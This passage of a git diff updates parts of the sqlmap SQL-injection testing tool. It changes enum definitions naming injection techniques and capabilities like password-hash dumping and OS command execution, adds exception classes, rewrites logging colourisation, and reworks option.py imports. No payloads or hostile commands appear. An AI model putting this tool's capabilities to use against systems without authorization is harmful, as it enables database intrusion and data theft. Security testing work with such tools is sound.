Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344") + PIXEL = ("Google Pixel 9", "Mozilla/5.0 (Linux; Android 14; Pixel 9) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/139.0.0.0 Mobile Safari/537.36") + XIAOMI = ("Xiaomi Redmi 15C", "Mozilla/5.0 (Linux; Android 15; REDMI 15C Build/AP3A.240905.015.A2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.118 Mobile Safari/537.36 XiaoMi/MiuiBrowser/14.43.0-gn") -class PROXY_TYPE: +class PROXY_TYPE(object): HTTP = "HTTP" + HTTPS = "HTTPS" SOCKS4 = "SOCKS4" SOCKS5 = "SOCKS5" -class DUMP_FORMAT: +class REGISTRY_OPERATION(object): + READ = "read" + ADD = "add" + DELETE = "delete" + +class DUMP_FORMAT(object): CSV = "CSV" HTML = "HTML" SQLITE = "SQLITE" -class HTTPHEADER: +class HTTP_HEADER(object): ACCEPT = "Accept" ACCEPT_CHARSET = "Accept-Charset" ACCEPT_ENCODING = "Accept-Encoding" @@ -143,21 +250,42 @@ class HTTPHEADER: CONTENT_RANGE = "Content-Range" CONTENT_TYPE = "Content-Type" COOKIE = "Cookie" - SET_COOKIE = "Set-Cookie" + EXPIRES = "Expires" HOST = "Host" + IF_MODIFIED_SINCE = "If-Modified-Since" + IF_NONE_MATCH = "If-None-Match" + LAST_MODIFIED = "Last-Modified" + LOCATION = "Location" PRAGMA = "Pragma" PROXY_AUTHORIZATION = "Proxy-Authorization" PROXY_CONNECTION = "Proxy-Connection" RANGE = "Range" REFERER = "Referer" + REFRESH = "Refresh" # Reference: http://stackoverflow.com/a/283794 + SERVER = "Server" + SET_COOKIE = "Set-Cookie" + TRANSFER_ENCODING = "Transfer-Encoding" + URI = "URI" USER_AGENT = "User-Agent" + VIA = "Via" + X_POWERED_BY = "X-Powered-By" + X_DATA_ORIGIN = "X-Data-Origin" -class EXPECTED: +class EXPECTED(object): BOOL = "bool" INT = "int" -class HASHDB_KEYS: +class OPTION_TYPE(object): + BOOLEAN = "boolean" + INTEGER = "integer" + FLOAT = "float" + STRING = "string" + +class HASHDB_KEYS(object): DBMS = "DBMS" + DBMS_FORK = "DBMS_FORK" + CHECK_WAF_RESULT = "CHECK_WAF_RESULT" + CHECK_NULL_CONNECTION_RESULT = "CHECK_NULL_CONNECTION_RESULT" CONF_TMP_PATH = "CONF_TMP_PATH" KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" @@ -165,111 +293,215 @@ class HASHDB_KEYS: KB_CHARS = "KB_CHARS" KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" KB_INJECTIONS = "KB_INJECTIONS" + KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" OS = "OS" -class REDIRECTION: - YES = "Y" - NO = "N" +class REDIRECTION(object): + YES = 'Y' + NO = 'N' -class PAYLOAD: +class PAYLOAD(object): SQLINJECTION = { - 1: "boolean-based blind", - 2: "error-based", - 3: "UNION query", - 4: "stacked queries", - 5: "AND/OR time-based blind", - 6: "inline query", - } + 1: "boolean-based blind", + 2: "error-based", + 3: "inline query", + 4: "stacked queries", + 5: "time-based blind", + 6: "UNION query", + } PARAMETER = { - 1: "Unescaped numeric", - 2: "Single quoted string", - 3: "LIKE single quoted string", - 4: "Double quoted string", - 5: "LIKE double quoted string", - } + 1: "Unescaped numeric", + 2: "Single quoted string", + 3: "LIKE single quoted string", + 4: "Double quoted string", + 5: "LIKE double quoted string", + 6: "Identifier (e.g. column name)", + } RISK = { - 0: "No risk", - 1: "Low risk", - 2: "Medium risk", - 3: "High risk", - } + 0: "No risk", + 1: "Low risk", + 2: "Medium risk", + 3: "High risk", + } CLAUSE = { - 0: "Always", - 1: "WHERE", - 2: "GROUP BY", - 3: "ORDER BY", - 4: "LIMIT", - 5: "OFFSET", - 6: "TOP", - 7: "Table name", - 8: "Column name", - } - - class METHOD: + 0: "Always", + 1: "WHERE", + 2: "GROUP BY", + 3: "ORDER BY", + 4: "LIMIT", + 5: "OFFSET", + 6: "TOP", + 7: "Table name", + 8: "Column name", + 9: "Pre-WHERE (non-query)", + } + + class METHOD(object): COMPARISON = "comparison" GREP = "grep" TIME = "time" UNION = "union" - class TECHNIQUE: + class TECHNIQUE(object): BOOLEAN = 1 ERROR = 2 - UNION = 3 + QUERY = 3 STACKED = 4 TIME = 5 - QUERY = 6 + UNION = 6 - class WHERE: + class WHERE(object): ORIGINAL = 1 NEGATIVE = 2 REPLACE = 3 -class WIZARD: +class WIZARD(object): BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba") - SMART = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") + INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll") -class ADJUST_TIME_DELAY: +class ADJUST_TIME_DELAY(object): DISABLE = -1 NO = 0 YES = 1 -class WEB_API: +class WEB_PLATFORM(object): PHP = "php" ASP = "asp" ASPX = "aspx" JSP = "jsp" - -class API_CONTENT_TYPE: - TECHNIQUES = 0 - BANNER = 1 - CURRENT_USER = 2 - CURRENT_DB = 3 - HOSTNAME = 4 - IS_DBA = 5 - USERS = 6 - PASSWORDS = 7 - PRIVILEGES = 8 - ROLES = 9 - DBS = 10 - TABLES = 11 - COLUMNS = 12 - SCHEMA = 13 - COUNT = 14 - DUMP_TABLE = 15 - SEARCH = 16 - SQL_QUERY = 17 - COMMON_TABLES = 18 - COMMON_COLUMNS = 19 - FILE_READ = 20 - FILE_WRITE = 21 - OS_CMD = 22 - REG_READ = 23 - -class API_CONTENT_STATUS: + CFM = "cfm" + +class CONTENT_TYPE(object): + TARGET = 0 + TECHNIQUES = 1 + DBMS_FINGERPRINT = 2 + BANNER = 3 + CURRENT_USER = 4 + CURRENT_DB = 5 + HOSTNAME = 6 + IS_DBA = 7 + USERS = 8 + PASSWORDS = 9 + PRIVILEGES = 10 + ROLES = 11 + DBS = 12 + TABLES = 13 + COLUMNS = 14 + SCHEMA = 15 + COUNT = 16 + DUMP_TABLE = 17 + SEARCH = 18 + SQL_QUERY = 19 + COMMON_TABLES = 20 + COMMON_COLUMNS = 21 + FILE_READ = 22 + FILE_WRITE = 23 + OS_CMD = 24 + REG_READ = 25 + STATEMENTS = 26 + +class CONTENT_STATUS(object): IN_PROGRESS = 0 COMPLETE = 1 + +class AUTH_TYPE(object): + BASIC = "basic" + DIGEST = "digest" + BEARER = "bearer" + NTLM = "ntlm" + PKI = "pki" + +class AUTOCOMPLETE_TYPE(object): + SQL = 0 + OS = 1 + SQLMAP = 2 + API = 3 + +class NOTE(object): + FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" + +class MKSTEMP_PREFIX(object): + HASHES = "sqlmaphashes-" + CRAWLER = "sqlmapcrawler-" + IPC = "sqlmapipc-" + CONFIG = "sqlmapconfig-" + TESTING = "sqlmaptesting-" + RESULTS = "sqlmapresults-" + COOKIE_JAR = "sqlmapcookiejar-" + BIG_ARRAY = "sqlmapbigarray-" + SPECIFIC_RESPONSE = "sqlmapresponse-" + PREPROCESS = "sqlmappreprocess-" + +class TIMEOUT_STATE(object): + NORMAL = 0 + EXCEPTION = 1 + TIMEOUT = 2 + +class HINT(object): + PREPEND = 0 + APPEND = 1 + +class FUZZ_UNION_COLUMN: + STRING = "" + INTEGER = "" + NULL = "NULL" + +class COLOR: + BLUE = "\033[34m" + BOLD_MAGENTA = "\033[35;1m" + BOLD_GREEN = "\033[32;1m" + BOLD_LIGHT_MAGENTA = "\033[95;1m" + LIGHT_GRAY = "\033[37m" + BOLD_RED = "\033[31;1m" + BOLD_LIGHT_GRAY = "\033[37;1m" + YELLOW = "\033[33m" + DARK_GRAY = "\033[90m" + BOLD_CYAN = "\033[36;1m" + LIGHT_RED = "\033[91m" + CYAN = "\033[36m" + MAGENTA = "\033[35m" + LIGHT_MAGENTA = "\033[95m" + LIGHT_GREEN = "\033[92m" + RESET = "\033[0m" + BOLD_DARK_GRAY = "\033[90;1m" + BOLD_LIGHT_YELLOW = "\033[93;1m" + BOLD_LIGHT_RED = "\033[91;1m" + BOLD_LIGHT_GREEN = "\033[92;1m" + LIGHT_YELLOW = "\033[93m" + BOLD_LIGHT_BLUE = "\033[94;1m" + BOLD_LIGHT_CYAN = "\033[96;1m" + LIGHT_BLUE = "\033[94m" + BOLD_WHITE = "\033[97;1m" + LIGHT_CYAN = "\033[96m" + BLACK = "\033[30m" + BOLD_YELLOW = "\033[33;1m" + BOLD_BLUE = "\033[34;1m" + GREEN = "\033[32m" + WHITE = "\033[97m" + BOLD_BLACK = "\033[30;1m" + RED = "\033[31m" + UNDERLINE = "\033[4m" + +class BACKGROUND: + BLUE = "\033[44m" + LIGHT_GRAY = "\033[47m" + YELLOW = "\033[43m" + DARK_GRAY = "\033[100m" + LIGHT_RED = "\033[101m" + CYAN = "\033[46m" + MAGENTA = "\033[45m" + LIGHT_MAGENTA = "\033[105m" + LIGHT_GREEN = "\033[102m" + RESET = "\033[0m" + LIGHT_YELLOW = "\033[103m" + LIGHT_BLUE = "\033[104m" + LIGHT_CYAN = "\033[106m" + BLACK = "\033[40m" + GREEN = "\033[42m" + WHITE = "\033[107m" + RED = "\033[41m" diff --git a/lib/core/exception.py b/lib/core/exception.py index ba21662416e..4d111073dec 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ class SqlmapBaseException(Exception): @@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException): class SqlmapGenericException(SqlmapBaseException): pass +class SqlmapInstallationException(SqlmapBaseException): + pass + class SqlmapMissingDependence(SqlmapBaseException): pass @@ -44,12 +47,24 @@ class SqlmapSilentQuitException(SqlmapBaseException): class SqlmapUserQuitException(SqlmapBaseException): pass +class SqlmapShellQuitException(SqlmapBaseException): + pass + +class SqlmapSkipTargetException(SqlmapBaseException): + pass + class SqlmapSyntaxException(SqlmapBaseException): pass +class SqlmapSystemException(SqlmapBaseException): + pass + class SqlmapThreadException(SqlmapBaseException): pass +class SqlmapTokenException(SqlmapBaseException): + pass + class SqlmapUndefinedMethod(SqlmapBaseException): pass diff --git a/lib/core/htmlentities.py b/lib/core/htmlentities.py deleted file mode 100644 index 0304cddc968..00000000000 --- a/lib/core/htmlentities.py +++ /dev/null @@ -1,263 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html - -htmlEntities = { - 'quot': 34, - 'amp': 38, - 'lt': 60, - 'gt': 62, - 'nbsp': 160, - 'iexcl': 161, - 'cent': 162, - 'pound': 163, - 'curren': 164, - 'yen': 165, - 'brvbar': 166, - 'sect': 167, - 'uml': 168, - 'copy': 169, - 'ordf': 170, - 'laquo': 171, - 'not': 172, - 'shy': 173, - 'reg': 174, - 'macr': 175, - 'deg': 176, - 'plusmn': 177, - 'sup2': 178, - 'sup3': 179, - 'acute': 180, - 'micro': 181, - 'para': 182, - 'middot': 183, - 'cedil': 184, - 'sup1': 185, - 'ordm': 186, - 'raquo': 187, - 'frac14': 188, - 'frac12': 189, - 'frac34': 190, - 'iquest': 191, - 'Agrave': 192, - 'Aacute': 193, - 'Acirc': 194, - 'Atilde': 195, - 'Auml': 196, - 'Aring': 197, - 'AElig': 198, - 'Ccedil': 199, - 'Egrave': 200, - 'Eacute': 201, - 'Ecirc': 202, - 'Euml': 203, - 'Igrave': 204, - 'Iacute': 205, - 'Icirc': 206, - 'Iuml': 207, - 'ETH': 208, - 'Ntilde': 209, - 'Ograve': 210, - 'Oacute': 211, - 'Ocirc': 212, - 'Otilde': 213, - 'Ouml': 214, - 'times': 215, - 'Oslash': 216, - 'Ugrave': 217, - 'Uacute': 218, - 'Ucirc': 219, - 'Uuml': 220, - 'Yacute': 221, - 'THORN': 222, - 'szlig': 223, - 'agrave': 224, - 'aacute': 225, - 'acirc': 226, - 'atilde': 227, - 'auml': 228, - 'aring': 229, - 'aelig': 230, - 'ccedil': 231, - 'egrave': 232, - 'eacute': 233, - 'ecirc': 234, - 'euml': 235, - 'igrave': 236, - 'iacute': 237, - 'icirc': 238, - 'iuml': 239, - 'eth': 240, - 'ntilde': 241, - 'ograve': 242, - 'oacute': 243, - 'ocirc': 244, - 'otilde': 245, - 'ouml': 246, - 'divide': 247, - 'oslash': 248, - 'ugrave': 249, - 'uacute': 250, - 'ucirc': 251, - 'uuml': 252, - 'yacute': 253, - 'thorn': 254, - 'yuml': 255, - 'OElig': 338, - 'oelig': 339, - 'Scaron': 352, - 'fnof': 402, - 'scaron': 353, - 'Yuml': 376, - 'circ': 710, - 'tilde': 732, - 'Alpha': 913, - 'Beta': 914, - 'Gamma': 915, - 'Delta': 916, - 'Epsilon': 917, - 'Zeta': 918, - 'Eta': 919, - 'Theta': 920, - 'Iota': 921, - 'Kappa': 922, - 'Lambda': 923, - 'Mu': 924, - 'Nu': 925, - 'Xi': 926, - 'Omicron': 927, - 'Pi': 928, - 'Rho': 929, - 'Sigma': 931, - 'Tau': 932, - 'Upsilon': 933, - 'Phi': 934, - 'Chi': 935, - 'Psi': 936, - 'Omega': 937, - 'alpha': 945, - 'beta': 946, - 'gamma': 947, - 'delta': 948, - 'epsilon': 949, - 'zeta': 950, - 'eta': 951, - 'theta': 952, - 'iota': 953, - 'kappa': 954, - 'lambda': 955, - 'mu': 956, - 'nu': 957, - 'xi': 958, - 'omicron': 959, - 'pi': 960, - 'rho': 961, - 'sigmaf': 962, - 'sigma': 963, - 'tau': 964, - 'upsilon': 965, - 'phi': 966, - 'chi': 967, - 'psi': 968, - 'omega': 969, - 'thetasym': 977, - 'upsih': 978, - 'piv': 982, - 'bull': 8226, - 'hellip': 8230, - 'prime': 8242, - 'Prime': 8243, - 'oline': 8254, - 'frasl': 8260, - 'ensp': 8194, - 'emsp': 8195, - 'thinsp': 8201, - 'zwnj': 8204, - 'zwj': 8205, - 'lrm': 8206, - 'rlm': 8207, - 'ndash': 8211, - 'mdash': 8212, - 'lsquo': 8216, - 'rsquo': 8217, - 'sbquo': 8218, - 'ldquo': 8220, - 'rdquo': 8221, - 'bdquo': 8222, - 'dagger': 8224, - 'Dagger': 8225, - 'permil': 8240, - 'lsaquo': 8249, - 'rsaquo': 8250, - 'euro': 8364, - 'weierp': 8472, - 'image': 8465, - 'real': 8476, - 'trade': 8482, - 'alefsym': 8501, - 'larr': 8592, - 'uarr': 8593, - 'rarr': 8594, - 'darr': 8595, - 'harr': 8596, - 'crarr': 8629, - 'lArr': 8656, - 'uArr': 8657, - 'rArr': 8658, - 'dArr': 8659, - 'hArr': 8660, - 'forall': 8704, - 'part': 8706, - 'exist': 8707, - 'empty': 8709, - 'nabla': 8711, - 'isin': 8712, - 'notin': 8713, - 'ni': 8715, - 'prod': 8719, - 'sum': 8721, - 'minus': 8722, - 'lowast': 8727, - 'radic': 8730, - 'prop': 8733, - 'infin': 8734, - 'ang': 8736, - 'and': 8743, - 'or': 8744, - 'cap': 8745, - 'cup': 8746, - 'int': 8747, - 'there4': 8756, - 'sim': 8764, - 'cong': 8773, - 'asymp': 8776, - 'ne': 8800, - 'equiv': 8801, - 'le': 8804, - 'ge': 8805, - 'sub': 8834, - 'sup': 8835, - 'nsub': 8836, - 'sube': 8838, - 'supe': 8839, - 'oplus': 8853, - 'otimes': 8855, - 'perp': 8869, - 'sdot': 8901, - 'lceil': 8968, - 'rceil': 8969, - 'lfloor': 8970, - 'rfloor': 8971, - 'lang': 9001, - 'rang': 9002, - 'loz': 9674, - 'spades': 9824, - 'clubs': 9827, - 'hearts': 9829, - 'diams': 9830, -} diff --git a/lib/core/log.py b/lib/core/log.py index efd0bd46597..72e2028d191 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,11 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import logging +import re import sys from lib.core.enums import CUSTOM_LOGGING @@ -20,10 +21,91 @@ try: from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler - LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout) - LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) + class _ColorizingStreamHandler(ColorizingStreamHandler): + def colorize(self, message, levelno, force=False): + if levelno in self.level_map and (self.is_tty or force): + bg, fg, bold = self.level_map[levelno] + params = [] + + if bg in self.color_map: + params.append(str(self.color_map[bg] + 40)) + + if fg in self.color_map: + params.append(str(self.color_map[fg] + 30)) + + if bold: + params.append('1') + + if params and message: + match = re.search(r"\A(\s+)", message) + prefix = match.group(1) if match else "" + message = message[len(prefix):] + + match = re.search(r"\[([A-Z ]+)\]", message) # log level + if match: + level = match.group(1) + if message.startswith(self.bold): + message = message.replace(self.bold, "") + reset = self.reset + self.bold + params.append('1') + else: + reset = self.reset + message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) + + match = re.search(r"\A\s*\[([\d:]+)\]", message) # time + if match: + time = match.group(1) + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, self._reset(message))), 1) + + match = re.search(r"\[(#\d+)\]", message) # counter + if match: + counter = match.group(1) + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, self._reset(message))), 1) + + if level != "PAYLOAD": + if any(_ in message for _ in ("parsed DBMS error message",)): + match = re.search(r": '(.+)'", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + match = re.search(r"\bresumed: '(.+\.\.\.)", message) + if match: + string = match.group(1) + message = message.replace("'%s" % string, "'%s" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + match = re.search(r" \('(.+)'\)\Z", message) or re.search(r"output: '(.+)'\Z", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) + + if prefix: + message = "%s%s" % (prefix, message) + + message = message.replace("%s]" % self.bold, "]%s" % self.bold) # dirty patch + + return message + + disableColor = False + + for argument in sys.argv: + if "disable-col" in argument: + disableColor = True + break + + if disableColor: + LOGGER_HANDLER = logging.StreamHandler(sys.stdout) + else: + LOGGER_HANDLER = _ColorizingStreamHandler(sys.stdout) + LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) + LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) + LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) except ImportError: LOGGER_HANDLER = logging.StreamHandler(sys.stdout) @@ -31,4 +113,4 @@ LOGGER_HANDLER.setFormatter(FORMATTER) LOGGER.addHandler(LOGGER_HANDLER) -LOGGER.setLevel(logging.WARN) +LOGGER.setLevel(logging.INFO) diff --git a/lib/core/option.py b/lib/core/option.py index 39476b55975..75981997f80 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1,349 +1,182 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import cookielib +from __future__ import division + +import codecs +import collections +import functools +import glob import inspect +import json import logging import os +import random import re import socket -import string import sys -import sqlite3 +import tempfile import threading import time -import urllib2 -import urlparse - -import lib.core.common -import lib.core.threads -import lib.core.convert +import traceback from lib.controller.checks import checkConnection from lib.core.common import Backend from lib.core.common import boldifyMessage +from lib.core.common import checkFile from lib.core.common import dataToStdout -from lib.core.common import getPublicTypeMembers -from lib.core.common import extractRegexResult -from lib.core.common import filterStringValue +from lib.core.common import decodeStringEscape +from lib.core.common import fetchRandomAgent +from lib.core.common import filterNone +from lib.core.common import findLocalPort from lib.core.common import findPageForms from lib.core.common import getConsoleWidth from lib.core.common import getFileItems from lib.core.common import getFileType -from lib.core.common import getUnicode -from lib.core.common import isListLike +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import intersect from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile +from lib.core.common import parseRequestFile from lib.core.common import parseTargetDirect -from lib.core.common import parseTargetUrl from lib.core.common import paths -from lib.core.common import randomRange from lib.core.common import randomStr +from lib.core.common import readCachedFileContent from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import runningAsAdmin -from lib.core.common import sanitizeStr +from lib.core.common import safeExpandUser +from lib.core.common import safeFilepathEncode +from lib.core.common import saveConfig +from lib.core.common import setColor from lib.core.common import setOptimize from lib.core.common import setPaths from lib.core.common import singleTimeWarnMessage -from lib.core.common import UnicodeRawConfigParser from lib.core.common import urldecode -from lib.core.common import urlencode -from lib.core.convert import base64pickle -from lib.core.convert import base64unpickle +from lib.core.compat import cmp +from lib.core.compat import round +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import mergedOptions from lib.core.data import queries from lib.core.datatype import AttribDict from lib.core.datatype import InjectionDict +from lib.core.datatype import LRUDict +from lib.core.datatype import OrderedSet from lib.core.defaults import defaults from lib.core.dicts import DBMS_DICT from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.enums import ADJUST_TIME_DELAY +from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DUMP_FORMAT -from lib.core.enums import HTTPHEADER +from lib.core.enums import FORK +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import MOBILES +from lib.core.enums import OPTION_TYPE from lib.core.enums import PAYLOAD from lib.core.enums import PRIORITY from lib.core.enums import PROXY_TYPE from lib.core.enums import REFLECTIVE_COUNTER from lib.core.enums import WIZARD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUserQuitException +from lib.core.exception import SqlmapValueException from lib.core.log import FORMATTER from lib.core.optiondict import optDict -from lib.core.purge import purge -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import BURP_REQUEST_REGEX from lib.core.settings import CODECS_LIST_PAGE -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DB2_ALIASES +from lib.core.settings import DBMS_ALIASES from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_TOR_HTTP_PORTS -from lib.core.settings import DEFAULT_TOR_SOCKS_PORT -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import INJECT_HERE_MARK +from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS +from lib.core.settings import DEFAULT_USER_AGENT +from lib.core.settings import DUMMY_URL +from lib.core.settings import IGNORE_CODE_WILDCARD from lib.core.settings import IS_WIN +from lib.core.settings import KB_CHARS_BOUNDARY_CHAR +from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET from lib.core.settings import LOCALHOST -from lib.core.settings import MAXDB_ALIASES +from lib.core.settings import MAX_CONNECT_RETRIES from lib.core.settings import MAX_NUMBER_OF_THREADS -from lib.core.settings import MSSQL_ALIASES -from lib.core.settings import MYSQL_ALIASES from lib.core.settings import NULL -from lib.core.settings import ORACLE_ALIASES from lib.core.settings import PARAMETER_SPLITTING_REGEX -from lib.core.settings import PGSQL_ALIASES -from lib.core.settings import SITE -from lib.core.settings import SQLITE_ALIASES +from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT +from lib.core.settings import PROXY_ENVIRONMENT_VARIABLES +from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE +from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_OS -from lib.core.settings import SYBASE_ALIASES from lib.core.settings import TIME_DELAY_CANDIDATES -from lib.core.settings import UNENCODED_ORIGINAL_VALUE -from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import VERSION_STRING -from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData +from lib.core.threads import setDaemon from lib.core.update import update from lib.parse.configfile import configFileParser +from lib.parse.payloads import loadBoundaries from lib.parse.payloads import loadPayloads from lib.request.basic import checkCharEncoding +from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler +from lib.request.chunkedhandler import ChunkedHandler from lib.request.connect import Connect as Request from lib.request.dns import DNSServer -from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler -from lib.request.certhandler import HTTPSCertAuthHandler from lib.request.httpshandler import HTTPSHandler +from lib.request.pkihandler import HTTPSPKIAuthHandler from lib.request.rangehandler import HTTPRangeHandler from lib.request.redirecthandler import SmartRedirectHandler -from lib.request.templates import getPageTemplate -from lib.utils.api import setRestAPILog from lib.utils.crawler import crawl from lib.utils.deps import checkDependencies -from lib.utils.google import Google -from thirdparty.colorama.initialise import init as coloramainit +from lib.utils.har import HTTPCollectorFactory +from lib.utils.purge import purge +from lib.utils.search import search +from thirdparty import six from thirdparty.keepalive import keepalive -from thirdparty.oset.pyoset import oset +from thirdparty.multipart import multipartpost +from thirdparty.six.moves import collections_abc as _collections +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import http_cookiejar as _http_cookiejar +from thirdparty.six.moves import urllib as _urllib from thirdparty.socks import socks from xml.etree.ElementTree import ElementTree -authHandler = urllib2.BaseHandler() +authHandler = _urllib.request.BaseHandler() +chunkedHandler = ChunkedHandler() httpsHandler = HTTPSHandler() keepAliveHandler = keepalive.HTTPHandler() -proxyHandler = urllib2.BaseHandler() +proxyHandler = _urllib.request.ProxyHandler() redirectHandler = SmartRedirectHandler() rangeHandler = HTTPRangeHandler() +multipartPostHandler = multipartpost.MultipartPostHandler() -def _urllib2Opener(): - """ - This function creates the urllib2 OpenerDirector. - """ - - debugMsg = "creating HTTP requests opener object" - logger.debug(debugMsg) - - handlers = [proxyHandler, authHandler, redirectHandler, rangeHandler, httpsHandler] - - if not conf.dropSetCookie: - if not conf.loadCookies: - conf.cj = cookielib.CookieJar() - else: - conf.cj = cookielib.MozillaCookieJar() - resetCookieJar(conf.cj) - - handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - - if conf.proxy: - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - elif conf.aType: - warnMsg += "with authentication methods" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - opener = urllib2.build_opener(*handlers) - urllib2.install_opener(opener) - -def _feedTargetsDict(reqFile, addedTargetUrls): - """ - Parses web scarab and burp logs and adds results to the target url list - """ - - def _parseWebScarabLog(content): - """ - Parses web scarab logs (POST method not supported) - """ - - reqResList = content.split(WEBSCARAB_SPLITTER) - - for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) - method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) - cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) - - if not method or not url: - logger.debug("not a valid WebScarab log data") - continue - - if method.upper() == HTTPMETHOD.POST: - warnMsg = "POST requests from WebScarab logs aren't supported " - warnMsg += "as their body content is stored in separate files. " - warnMsg += "Nevertheless you can use -r to load them individually." - logger.warning(warnMsg) - continue - - if not(conf.scope and not re.search(conf.scope, url, 